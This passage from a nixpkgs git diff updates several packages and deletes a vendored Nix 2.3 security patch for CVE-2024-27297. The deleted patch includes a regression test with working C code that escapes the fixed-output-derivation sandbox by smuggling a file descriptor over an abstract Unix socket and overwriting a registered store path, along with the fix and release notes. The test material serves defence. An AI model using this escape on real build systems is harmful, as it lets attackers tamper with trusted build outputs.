\ --replace "pytest ~=7.2" "" \ @@ -37,6 +37,7 @@ python3.pkgs.buildPythonApplication rec { feedgen flask flask-compress + flask-cors flask-expects-json flask-login flask-paginate @@ -47,10 +48,13 @@ python3.pkgs.buildPythonApplication rec { jinja2-time jsonpath-ng jq + loguru lxml paho-mqtt pillow playwright + pyee + pyppeteer pytz requests selenium @@ -76,5 +80,6 @@ python3.pkgs.buildPythonApplication rec { changelog = "https://github.com/dgtlmoon/changedetection.io/releases/tag/${version}"; license = licenses.asl20; maintainers = with maintainers; [ mikaelfangel ]; + mainProgram = "changedetection.io"; }; } diff --git a/pkgs/servers/web-apps/wiki-js/default.nix b/pkgs/servers/web-apps/wiki-js/default.nix index 2c39348054367..753ad982ca0af 100644 --- a/pkgs/servers/web-apps/wiki-js/default.nix +++ b/pkgs/servers/web-apps/wiki-js/default.nix @@ -1,12 +1,12 @@ -{ stdenv, fetchurl, lib, nixosTests, jq, moreutils }: +{ stdenv, fetchurl, lib, nixosTests }: stdenv.mkDerivation rec { pname = "wiki-js"; - version = "2.5.301"; + version = "2.5.302"; src = fetchurl { url = "https://github.com/Requarks/wiki/releases/download/v${version}/${pname}.tar.gz"; - sha256 = "sha256-E1XXq4xzExOqBHjgvfVnZ9z8qH1/99ku53KYwQYe7kM="; + sha256 = "sha256-hz6pfiObVgoVAkYx0Js6Dc310mNMC9QT2D+sNqsl4LA="; }; sourceRoot = "."; diff --git a/pkgs/tools/games/minecraft/mcaselector/default.nix b/pkgs/tools/games/minecraft/mcaselector/default.nix index 0cf48dbe0b6b3..8a23763e3acbc 100644 --- a/pkgs/tools/games/minecraft/mcaselector/default.nix +++ b/pkgs/tools/games/minecraft/mcaselector/default.nix @@ -2,6 +2,7 @@ , stdenvNoCC , fetchurl , makeWrapper +, wrapGAppsHook , jre }: @@ -17,7 +18,9 @@ stdenvNoCC.mkDerivation (finalAttrs: { dontUnpack = true; dontBuild = true; - nativeBuildInputs = [ jre makeWrapper ]; + nativeBuildInputs = [ jre makeWrapper wrapGAppsHook ]; + + dontWrapGApps = true; installPhase = '' runHook preInstall @@ -25,7 +28,8 @@ stdenvNoCC.mkDerivation (finalAttrs: { mkdir -p $out/{bin,lib/mcaselector} cp $src $out/lib/mcaselector/mcaselector.jar makeWrapper ${jre}/bin/java $out/bin/mcaselector \ - --add-flags "-jar $out/lib/mcaselector/mcaselector.jar" + --add-flags "-jar $out/lib/mcaselector/mcaselector.jar" \ + ''${gappsWrapperArgs[@]} runHook postInstall ''; diff --git a/pkgs/tools/misc/calamares-nixos-extensions/default.nix b/pkgs/tools/misc/calamares-nixos-extensions/default.nix index 6bca9abeb9f6e..2b8965544ab3d 100644 --- a/pkgs/tools/misc/calamares-nixos-extensions/default.nix +++ b/pkgs/tools/misc/calamares-nixos-extensions/default.nix @@ -2,13 +2,13 @@ stdenv.mkDerivation rec { pname = "calamares-nixos-extensions"; - version = "0.3.14"; + version = "0.3.15"; src = fetchFromGitHub { owner = "NixOS"; repo = "calamares-nixos-extensions"; rev = version; - hash = "sha256-wRKZ80yU3WsUkGn5/ft4wDR22s39/WTxTrjFE0/9mlc="; + hash = "sha256-PZQjrteLWcInXIavuANHfzfl9gOXATWtIlDUp45j5Ao="; }; installPhase = '' diff --git a/pkgs/tools/misc/calamares/default.nix b/pkgs/tools/misc/calamares/default.nix index 6b9b50144708c..87f81724eaa5a 100644 --- a/pkgs/tools/misc/calamares/default.nix +++ b/pkgs/tools/misc/calamares/default.nix @@ -7,12 +7,12 @@ mkDerivation rec { pname = "calamares"; - version = "3.2.62"; + version = "3.3.3"; # release including submodule src = fetchurl { url = "https://github.com/calamares/calamares/releases/download/v${version}/${pname}-${version}.tar.gz"; - sha256 = "sha256-oPvOwqQ4aTdT/BdCIDVhGa1624orGcMXUYqhywJdbdA="; + sha256 = "sha256-XCp2Qc2y9eF2Z0BqfTtzUkf6860KzHl1lZE7kiHZbQM="; }; patches = lib.optionals nixos-extensions [ diff --git a/pkgs/tools/misc/calamares/nixos-extensions-paths.patch b/pkgs/tools/misc/calamares/nixos-extensions-paths.patch index 4e0012160e9fb..292310e314f9a 100644 --- a/pkgs/tools/misc/calamares/nixos-extensions-paths.patch +++ b/pkgs/tools/misc/calamares/nixos-extensions-paths.patch @@ -1,21 +1,20 @@ diff --git a/src/calamares/main.cpp b/src/calamares/main.cpp -index de709156f..a0b6c5faf 100644 +index e0491e5f9..faf272016 100644 --- a/src/calamares/main.cpp +++ b/src/calamares/main.cpp -@@ -131,6 +132,8 @@ main( int argc, char* argv[] ) - // TODO: umount anything in /tmp/calamares-... as an emergency save function +@@ -132,6 +132,7 @@ main( int argc, char* argv[] ) #endif -+ CalamaresUtils::setNixosDirs(); -+ - bool is_debug = handle_args( a ); - - #ifdef WITH_KF5DBus + std::unique_ptr< KDSingleApplication > possiblyUnique; ++ Calamares::setNixosDirs(); + const bool is_debug = handle_args( a ); + if ( !is_debug ) + { diff --git a/src/libcalamares/utils/Dirs.cpp b/src/libcalamares/utils/Dirs.cpp -index f333d6e64..6118fb412 100644 +index c42768a08..bac98645a 100644 --- a/src/libcalamares/utils/Dirs.cpp +++ b/src/libcalamares/utils/Dirs.cpp -@@ -115,6 +116,14 @@ setXdgDirs() +@@ -114,6 +114,14 @@ setXdgDirs() s_haveExtraDirs = !( s_extraConfigDirs.isEmpty() && s_extraDataDirs.isEmpty() ); } @@ -31,7 +30,7 @@ index f333d6e64..6118fb412 100644 extraConfigDirs() { diff --git a/src/libcalamares/utils/Dirs.h b/src/libcalamares/utils/Dirs.h -index 445cbe1f1..da869d446 100644 +index d0edd7a4f..26bd16b4e 100644 --- a/src/libcalamares/utils/Dirs.h +++ b/src/libcalamares/utils/Dirs.h @@ -50,6 +50,9 @@ DLLEXPORT bool isAppDataDirOverridden(); diff --git a/pkgs/tools/misc/calamares/nonroot.patch b/pkgs/tools/misc/calamares/nonroot.patch index 7843f45f284ce..24e47574142f3 100644 --- a/pkgs/tools/misc/calamares/nonroot.patch +++ b/pkgs/tools/misc/calamares/nonroot.patch @@ -1,8 +1,8 @@ diff --git a/src/libcalamares/utils/Runner.cpp b/src/libcalamares/utils/Runner.cpp -index c7146c2d7..e165d9a8f 100644 +index 632f32028..fe9052449 100644 --- a/src/libcalamares/utils/Runner.cpp +++ b/src/libcalamares/utils/Runner.cpp -@@ -140,13 +140,13 @@ Calamares::Utils::Runner::run() +@@ -137,13 +137,13 @@ Calamares::Utils::Runner::run() } if ( m_location == RunLocation::RunInTarget ) { @@ -21,10 +21,10 @@ index c7146c2d7..e165d9a8f 100644 if ( m_output ) diff --git a/src/modules/mount/main.py b/src/modules/mount/main.py -index a3318d1a0..5fbe202fd 100644 +index 4202639f3..de2556b91 100644 --- a/src/modules/mount/main.py +++ b/src/modules/mount/main.py -@@ -152,7 +152,8 @@ def mount_partition(root_mount_point, partition, partitions): +@@ -235,7 +235,8 @@ def mount_partition(root_mount_point, partition, partitions, mount_options, moun # Ensure that the created directory has the correct SELinux context on # SELinux-enabled systems. @@ -34,7 +34,7 @@ index a3318d1a0..5fbe202fd 100644 try: subprocess.call(['chcon', '--reference=' + raw_mount_point, mount_point]) except FileNotFoundError as e: -@@ -193,13 +194,13 @@ def mount_partition(root_mount_point, partition, partitions): +@@ -278,13 +279,13 @@ def mount_partition(root_mount_point, partition, partitions, mount_options, moun for s in btrfs_subvolumes: if not s["subvolume"]: continue @@ -52,10 +52,10 @@ index a3318d1a0..5fbe202fd 100644 device = partition["device"] diff --git a/src/modules/welcome/checker/GeneralRequirements.cpp b/src/modules/welcome/checker/GeneralRequirements.cpp -index ca7219ca4..6ac682ba4 100644 +index a58f3df83..b66576b09 100644 --- a/src/modules/welcome/checker/GeneralRequirements.cpp +++ b/src/modules/welcome/checker/GeneralRequirements.cpp -@@ -371,10 +371,34 @@ GeneralRequirements::checkEnoughStorage( qint64 requiredSpace ) +@@ -431,10 +431,35 @@ GeneralRequirements::checkEnoughStorage( qint64 requiredSpace ) cWarning() << "GeneralRequirements is configured without libparted."; return false; #else @@ -88,9 +88,10 @@ index ca7219ca4..6ac682ba4 100644 + + return false; +} - ++ bool GeneralRequirements::checkEnoughRam( qint64 requiredRam ) + { diff --git a/src/modules/welcome/checker/GeneralRequirements.h b/src/modules/welcome/checker/GeneralRequirements.h index b6646da11..ea27324fa 100644 --- a/src/modules/welcome/checker/GeneralRequirements.h diff --git a/pkgs/tools/misc/calamares/supportedlocale.patch b/pkgs/tools/misc/calamares/supportedlocale.patch index ab161ffdee7c2..859018d4947ff 100644 --- a/pkgs/tools/misc/calamares/supportedlocale.patch +++ b/pkgs/tools/misc/calamares/supportedlocale.patch @@ -1,5 +1,5 @@ diff --git a/src/modules/locale/Config.cpp b/src/modules/locale/Config.cpp -index 2357019a7..75b547430 100644 +index 54ff5eb64..1a2b98c9c 100644 --- a/src/modules/locale/Config.cpp +++ b/src/modules/locale/Config.cpp @@ -48,7 +48,7 @@ loadLocales( const QString& localeGenPath ) diff --git a/pkgs/tools/misc/calamares/uimod.patch b/pkgs/tools/misc/calamares/uimod.patch index 5a6ec6cdeea2e..f45f68f9a5b30 100644 --- a/pkgs/tools/misc/calamares/uimod.patch +++ b/pkgs/tools/misc/calamares/uimod.patch @@ -1,33 +1,33 @@ diff --git a/src/modules/finished/FinishedPage.cpp b/src/modules/finished/FinishedPage.cpp -index 6c5f9ad16..24d75e07b 100644 +index 23cb194c4..8714937f6 100644 --- a/src/modules/finished/FinishedPage.cpp +++ b/src/modules/finished/FinishedPage.cpp -@@ -71,7 +71,10 @@ FinishedPage::retranslate() +@@ -74,7 +74,10 @@ FinishedPage::retranslate() { ui->mainText->setText( tr( "<h1>All done.</h1><br/>" "%1 has been set up on your computer.<br/>" -- "You may now start using your new system." ) +- "You may now start using your new system.", "@info" ) + "You may now start using your new system.<br/>" + "You can change every setting later except the bootloader.<br/>" + "Check the <a href=\"https://nixos.org/manual/nixos/stable/\">manual</a> for instructions on how to install software, upgrade the system or enable services.<br/>" -+ "You can find ways to get in touch with the <a href=\"https://nixos.org/community/\">community on the website!</a>") ++ "You can find ways to get in touch with the <a href=\"https://nixos.org/community/\">community on the website!</a>", "@info" ) .arg( branding->versionedName() ) ); ui->restartCheckBox->setToolTip( tr( "<html><head/><body>" "<p>When this box is checked, your system will " -@@ -84,7 +87,10 @@ FinishedPage::retranslate() +@@ -87,7 +90,10 @@ FinishedPage::retranslate() ui->mainText->setText( tr( "<h1>All done.</h1><br/>" "%1 has been installed on your computer.<br/>" "You may now restart into your new system, or continue " -- "using the %2 Live environment." ) +- "using the %2 Live environment.", "@info" ) + "using the %2 Live environment.<br/>" + "You can change every setting later except the bootloader.<br/>" + "Check the <a href=\"https://nixos.org/manual/nixos/stable/\">manual</a> for instructions on how to install software, upgrade the system or enable services.<br/>" -+ "You can find ways to get in touch with the <a href=\"https://nixos.org/community/\">community on the website!</a>") ++ "You can find ways to get in touch with the <a href=\"https://nixos.org/community/\">community on the website!</a>", "@info" ) .arg( branding->versionedName(), branding->productName() ) ); ui->restartCheckBox->setToolTip( tr( "<html><head/><body>" "<p>When this box is checked, your system will " diff --git a/src/modules/packagechooser/PackageChooserPage.cpp b/src/modules/packagechooser/PackageChooserPage.cpp -index 721329c1b..164b9945e 100644 +index 44a570d2f..4dc931bf3 100644 --- a/src/modules/packagechooser/PackageChooserPage.cpp +++ b/src/modules/packagechooser/PackageChooserPage.cpp @@ -52,6 +52,7 @@ PackageChooserPage::currentChanged( const QModelIndex& index ) @@ -39,14 +39,14 @@ index 721329c1b..164b9945e 100644 ui->productDescription->setText( m_introduction.description.get() ); } diff --git a/src/modules/packagechooser/page_package.ui b/src/modules/packagechooser/page_package.ui -index d021b08b3..fecfa3060 100644 +index 2ab5b7f13..bed462069 100644 --- a/src/modules/packagechooser/page_package.ui +++ b/src/modules/packagechooser/page_package.ui -@@ -38,19 +38,6 @@ SPDX-License-Identifier: GPL-3.0-or-later +@@ -37,20 +37,7 @@ SPDX-License-Identifier: GPL-3.0-or-later + </widget> </item> <item> - <layout class="QVBoxLayout" name="verticalLayout" stretch="1,30,1"> -+ <layout class="QVBoxLayout" name="verticalLayout" stretch="30,1,1"> - <item> - <widget class="QLabel" name="productName"> - <property name="sizePolicy"> @@ -60,6 +60,7 @@ index d021b08b3..fecfa3060 100644 - </property> - </widget> - </item> ++ <layout class="QVBoxLayout" name="verticalLayout" stretch="30,1,1"> <item> <widget class="FixedAspectRatioLabel" name="productScreenshot"> <property name="sizePolicy"> diff --git a/pkgs/tools/misc/calamares/waylandkbd.patch b/pkgs/tools/misc/calamares/waylandkbd.patch index 37cddcf4e2af9..4c282b04062f2 100644 --- a/pkgs/tools/misc/calamares/waylandkbd.patch +++ b/pkgs/tools/misc/calamares/waylandkbd.patch @@ -1,20 +1,20 @@ diff --git a/src/modules/keyboard/Config.cpp b/src/modules/keyboard/Config.cpp -index 720588810..af0dd1c8d 100644 +index d8b1e8e86..b2e1b7b5f 100644 --- a/src/modules/keyboard/Config.cpp +++ b/src/modules/keyboard/Config.cpp -@@ -219,7 +219,10 @@ Config::xkbApply() +@@ -307,7 +307,10 @@ Config::xkbApply() + xkbmap_layout_args( { m_additionalLayoutInfo.additionalLayout, m_selectedLayout }, { m_additionalLayoutInfo.additionalVariant, m_selectedVariant }, m_additionalLayoutInfo.groupSwitcher ) ); - - + QString xkbmap = QString( "[('xkb','%1\%2'),('xkb','%3\%4')]").arg( -+ m_selectedLayout, ((!m_selectedVariant.isEmpty()) ? "+" + m_selectedVariant : ""), -+ m_additionalLayoutInfo.additionalLayout, ((!m_additionalLayoutInfo.additionalVariant.isEmpty()) ? "+" + m_additionalLayoutInfo.additionalVariant : "")); ++ m_selectedLayout, ((!m_selectedVariant.isEmpty()) ? "+" + m_selectedVariant : ""), ++ m_additionalLayoutInfo.additionalLayout, ((!m_additionalLayoutInfo.additionalVariant.isEmpty()) ? "+" + m_additionalLayoutInfo.additionalVariant : "")); + QProcess::execute( "sh", { "-c", "if command -v gsettings; then gsettings set org.gnome.desktop.input-sources sources \"$0\"; fi", xkbmap }); cDebug() << "xkbmap selection changed to: " << m_selectedLayout << '-' << m_selectedVariant << "(added " << m_additionalLayoutInfo.additionalLayout << "-" << m_additionalLayoutInfo.additionalVariant << " since current layout is not ASCII-capable)"; -@@ -227,6 +230,8 @@ Config::xkbApply() +@@ -315,6 +318,8 @@ Config::xkbApply() else { QProcess::execute( "setxkbmap", xkbmap_layout_args( m_selectedLayout, m_selectedVariant ) ); diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 986975a699737..8710b9ba785e8 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -152,11 +152,10 @@ let in lib.makeExtensible (self: ({ nix_2_3 = (common { - version = "2.3.17"; - hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4="; + version = "2.3.18"; + hash = "sha256-jBz2Ub65eFYG+aWgSI3AJYvLSghio77fWQiIW1svA9U="; patches = [ patch-monitorfdhup - ./patches/2_3/CVE-2024-27297.patch ]; maintainers = with lib.maintainers; [ flokli raitobezarius ]; }).override { boehmgc = boehmgc-nix_2_3; }; diff --git a/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch b/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch deleted file mode 100644 index b8201cb99ef5c..0000000000000 --- a/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch +++ /dev/null @@ -1,375 +0,0 @@ -From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <theophane.hufschmitt@tweag.io> -Date: Mon, 12 Feb 2024 21:28:20 +0100 -Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape - -Test that we can't leverage abstract unix domain sockets to leak file -descriptors out of the sandbox and modify the path after it has been -registered. ---- - release.nix | 5 ++ - tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++ - tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ - tests/nixos/ca-fd-leak/smuggler.c | 66 +++++++++++++++++++++ - 4 files changed, 229 insertions(+) - create mode 100644 tests/nixos/ca-fd-leak/default.nix - create mode 100644 tests/nixos/ca-fd-leak/sender.c - create mode 100644 tests/nixos/ca-fd-leak/smuggler.c - -diff --git a/release.nix b/release.nix -index f468946c5..2e71f3796 100644 ---- a/release.nix -+++ b/release.nix -@@ -235,6 +235,11 @@ let - nix = build.x86_64-linux; system = "x86_64-linux"; - }); - -+ tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec { -+ inherit nixpkgs; -+ nix = build.x86_64-linux; system = "x86_64-linux"; -+ }); -+ - tests.setuid = pkgs.lib.genAttrs - ["i686-linux" "x86_64-linux"] - (system: -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -new file mode 100644 -index 000000000..c252caa4d ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -0,0 +1,93 @@ -+# Nix is a sandboxed build system. But Not everything can be handled inside its -+# sandbox: Network access is normally blocked off, but to download sources, a -+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". -+# The detail here is not important, but in our case it means that the hash of -+# the output has to be known beforehand. And if you know that, you get a few -+# rights: you no longer run inside a special network namespace! -+# -+# Now, Linux has a special feature, that not many other unices do: Abstract -+# unix domain sockets! Not only that, but those are namespaced using the -+# network namespace! That means that we have a way to create sockets that are -+# available in every single fixed-output derivation, and also all processes -+# running on the host machine! Now, this wouldn't be that much of an issue, as, -+# well, the whole idea is that the output is pure, and all processes in the -+# sandbox are killed before finalizing the output. What if we didn't need those -+# processes at all? Unix domain sockets have a semi-known trick: you can pass -+# file descriptors around! -+# This makes it possible to exfiltrate a file-descriptor with write access to -+# $out outside of the sandbox. And that file-descriptor can be used to modify -+# the contents of the store path after it has been registered. -+ -+{ nixpkgs, system, nix }: -+ -+with import (nixpkgs + "/nixos/lib/testing-python.nix") { -+ inherit system; -+}; -+ -+let -+ # Simple C program that sends a a file descriptor to `$out` to a Unix -+ # domain socket. -+ # Compiled statically so that we can easily send it to the VM and use it -+ # inside the build sandbox. -+ sender = pkgs.runCommandWith { -+ name = "sender"; -+ stdenv = pkgs.pkgsStatic.stdenv; -+ } '' -+ $CC -static -o $out ${./sender.c} -+ ''; -+ -+ # Okay, so we have a file descriptor shipped out of the FOD now. But the -+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor -+ # lives in a mount namespace where it is not! So even when this file exists -+ # in the actual Nix store, we're capable of just modifying its contents... -+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); -+ -+ # The abstract socket path used to exfiltrate the file descriptor -+ socketName = "FODSandboxExfiltrationSocket"; -+in -+makeTest { -+ name = "ca-fd-leak"; -+ -+ nodes.machine = -+ { config, lib, pkgs, ... }: -+ { virtualisation.writableStore = true; -+ virtualisation.pathsInNixDB = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; -+ nix.binaryCaches = [ ]; -+ nix.package = nix; -+ }; -+ -+ testScript = { nodes }: '' -+ start_all() -+ -+ machine.succeed("echo hello") -+ # Start the smuggler server -+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") -+ -+ # Build the smuggled derivation. -+ # This will connect to the smuggler server and send it the file descriptor -+ machine.succeed(r""" -+ nix-build -E ' -+ builtins.derivation { -+ name = "smuggled"; -+ system = builtins.currentSystem; -+ # look ma, no tricks! -+ outputHashMode = "flat"; -+ outputHashAlgo = "sha256"; -+ outputHash = builtins.hashString "sha256" "hello, world\n"; -+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; -+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; -+ }' -+ """.strip()) -+ -+ -+ # Tell the smuggler server that we're done -+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") -+ -+ # Check that the file was modified -+ machine.succeed(r""" -+ cat ./result -+ test "$(cat ./result)" = "hello, world" -+ """.strip()) -+ ''; -+ -+} -diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c -new file mode 100644 -index 000000000..75e54fc8f ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/sender.c -@@ -0,0 +1,65 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <fcntl.h> -+#include <errno.h> -+#include <string.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Set up a abstract domain socket path to connect to. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ -+ // Now try to connect, To ensure we work no matter what order we are -+ // executed in, just busyloop here. -+ int res = -1; -+ while (res < 0) { -+ res = connect(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0 && errno != ECONNREFUSED) perror("connect"); -+ if (errno != ECONNREFUSED) break; -+ } -+ -+ // Write our message header. -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Write an SCM_RIGHTS message containing the output path. -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ hdr->cmsg_len = CMSG_LEN(sizeof(int)); -+ hdr->cmsg_level = SOL_SOCKET; -+ hdr->cmsg_type = SCM_RIGHTS; -+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); -+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); -+ -+ msg.msg_controllen = CMSG_SPACE(sizeof(int)); -+ -+ // Write a single null byte too. -+ msg.msg_iov = malloc(sizeof(struct iovec)); -+ msg.msg_iov[0].iov_base = ""; -+ msg.msg_iov[0].iov_len = 1; -+ msg.msg_iovlen = 1; -+ -+ // Send it to the othher side of this connection. -+ res = sendmsg(sock, &msg, 0); -+ if (res < 0) perror("sendmsg"); -+ int buf; -+ -+ // Wait for the server to close the socket, implying that it has -+ // received the commmand. -+ recv(sock, (void *)&buf, sizeof(int), 0); -+} -diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c -new file mode 100644 -index 000000000..82acf37e6 ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/smuggler.c -@@ -0,0 +1,66 @@ -+#include <sys/socket.h> -+#include <sys/un.h> -+#include <stdlib.h> -+#include <stddef.h> -+#include <stdio.h> -+#include <unistd.h> -+#include <assert.h> -+ -+int main(int argc, char **argv) { -+ -+ assert(argc == 2); -+ -+ int sock = socket(AF_UNIX, SOCK_STREAM, 0); -+ -+ // Bind to the socket. -+ struct sockaddr_un data; -+ data.sun_family = AF_UNIX; -+ data.sun_path[0] = 0; -+ strcpy(data.sun_path + 1, argv[1]); -+ int res = bind(sock, (const struct sockaddr *)&data, -+ offsetof(struct sockaddr_un, sun_path) -+ + strlen(argv[1]) -+ + 1); -+ if (res < 0) perror("bind"); -+ -+ res = listen(sock, 1); -+ if (res < 0) perror("listen"); -+ -+ int smuggling_fd = -1; -+ -+ // Accept the connection a first time to receive the file descriptor. -+ fprintf(stderr, "%s\n", "Waiting for the first connection"); -+ int a = accept(sock, 0, 0); -+ if (a < 0) perror("accept"); -+ -+ struct msghdr msg = {0}; -+ msg.msg_control = malloc(128); -+ msg.msg_controllen = 128; -+ -+ // Receive the file descriptor as sent by the smuggler. -+ recvmsg(a, &msg, 0); -+ -+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); -+ while (hdr) { -+ if (hdr->cmsg_level == SOL_SOCKET -+ && hdr->cmsg_type == SCM_RIGHTS) { -+ -+ // Grab the copy of the file descriptor. -+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); -+ } -+ -+ hdr = CMSG_NXTHDR(&msg, hdr); -+ } -+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); -+ close(a); -+ -+ // Wait for a second connection, which will tell us that the build is -+ // done -+ a = accept(sock, 0, 0); -+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); -+ // Write a new content to the file -+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); -+ char * new_content = "Pwned\n"; -+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); -+ if (written_bytes != strlen(new_content)) perror("write"); -+} - -From 8c27eb6c1bc490c9d2f3c7c1dedb1ca3c8e00759 Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <theophane.hufschmitt@tweag.io> -Date: Tue, 13 Feb 2024 08:28:02 +0100 -Subject: [PATCH 2/4] Copy the output of fixed-output derivations before - registering them - -It is possible to exfiltrate a file descriptor out of the build sandbox -of FODs, and use it to modify the store path after it has been -registered. -To avoid that issue, don't register the output of the build, but a copy -of it (that will be free of any leaked file descriptor). ---- - src/libstore/build.cc | 11 +++++++++-- - 1 file changed, 9 insertions(+), 2 deletions(-) - -diff --git a/src/libstore/build.cc b/src/libstore/build.cc -index d3a712c1a..3fb827a15 100644 ---- a/src/libstore/build.cc -+++ b/src/libstore/build.cc -@@ -3286,10 +3286,17 @@ void DerivationGoal::registerOutputs() - throw BuildError(format("suspicious ownership or permission on '%1%'; rejecting this build output") % path); - #endif - -- /* Apply hash rewriting if necessary. */ -+ /* Apply hash rewriting if necessary. -+ * -+ * For FODs, we always do the dump-and-restore dance regardless to make -+ * sure that there's no stale file descriptor pointing to the output -+ * of the path. -+ * */ - bool rewritten = false; -- if (!outputRewrites.empty()) { -+ if (fixedOutput || !outputRewrites.empty()) { -+ if (!outputRewrites.empty()) { - printError(format("warning: rewriting hashes in '%1%'; cross fingers") % path); -+ } - - /* Canonicalise first. This ensures that the path we're - rewriting doesn't contain a hard link to /etc/shadow or - -From 2064277b0566c361339d55fbbf46edbc2519f3b3 Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <7226587+thufschmitt@users.noreply.github.com> -Date: Wed, 21 Feb 2024 17:32:36 +0100 -Subject: [PATCH 3/4] Fix a typo in a test comment - -Co-authored-by: Valentin Gagarin <valentin.gagarin@tweag.io> ---- - tests/nixos/ca-fd-leak/default.nix | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -index c252caa4d..2fd5ca2d6 100644 ---- a/tests/nixos/ca-fd-leak/default.nix -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -83,7 +83,7 @@ makeTest { - # Tell the smuggler server that we're done - machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") - -- # Check that the file was modified -+ # Check that the file was not modified - machine.succeed(r""" - cat ./result - test "$(cat ./result)" = "hello, world" - -From 8604f6d32976fbdf84e46f75cbfa2446209b8a6b Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <theophane.hufschmitt@tweag.io> -Date: Fri, 1 Mar 2024 09:31:05 +0100 -Subject: [PATCH 4/4] Add release notes - ---- - doc/manual/rl-next/fod-sandbox-escape.md | 14 ++++++++++++++ - 1 file changed, 14 insertions(+) - create mode 100644 doc/manual/rl-next/fod-sandbox-escape.md - -diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md -new file mode 100644 -index 000000000..ed451711e ---- /dev/null -+++ b/doc/manual/rl-next/fod-sandbox-escape.md -@@ -0,0 +1,14 @@ -+--- -+synopsis: Fix a FOD sandbox escape -+issues: -+prs: -+--- -+ -+Cooperating Nix derivations could send file descriptors to files in the Nix -+store to each other via Unix domain sockets in the abstract namespace. This -+allowed one derivation to modify the output of the other derivation, after Nix -+has registered the path as "valid" and immutable in the Nix database. -+In particular, this allowed the output of fixed-output derivations to be -+modified from their expected content. -+ -+This isn't the case any more. diff --git a/pkgs/tools/security/agebox/default.nix b/pkgs/tools/security/agebox/default.nix index b87cb2b8ca2af..fb75fbf9b0937 100644 --- a/pkgs/tools/security/agebox/default.nix +++ b/pkgs/tools/security/agebox/default.nix @@ -1,4 +1,4 @@ -{ lib, buildGoModule, fetchFromGitHub }: +{ lib, buildGoModule, fetchFromGitHub, fetchpatch }: buildGoModule rec { pname = "agebox"; @@ -11,7 +11,16 @@ buildGoModule rec { hash = "sha256-W6/v5BIl+k6tMan/Wdua7mHKMsq23QZN13Cy24akJr4="; }; - vendorHash = "sha256-PLeNTlQ0OMcupfbVN/KGb0iJYf3Jbcevg8gTcKHpn8s="; + patches = [ + # Update gopkg.in/yaml.v2 to v2.2.8 to fix vulnerabilities. + # https://github.com/slok/agebox/pull/199 + (fetchpatch { + url = "https://github.com/slok/agebox/commit/40a515d39911f601ebe05cc914e8a02695d85dc7.patch"; + hash = "sha256-0iBI0nID12OoWqWY/8MPb3vvTUDe0JdSHu2vefix/bM="; + }) + ]; + + vendorHash = "sha256-MNAF2ExIOYPzXyGR6H7lfUEhnMDCyD7ecst5MKm7u+A="; ldflags = [ "-s" diff --git a/pkgs/tools/security/opensc/default.nix b/pkgs/tools/security/opensc/default.nix index 6edc9a7da55cd..8d8246028f7c3 100644 --- a/pkgs/tools/security/opensc/default.nix +++ b/pkgs/tools/security/opensc/default.nix @@ 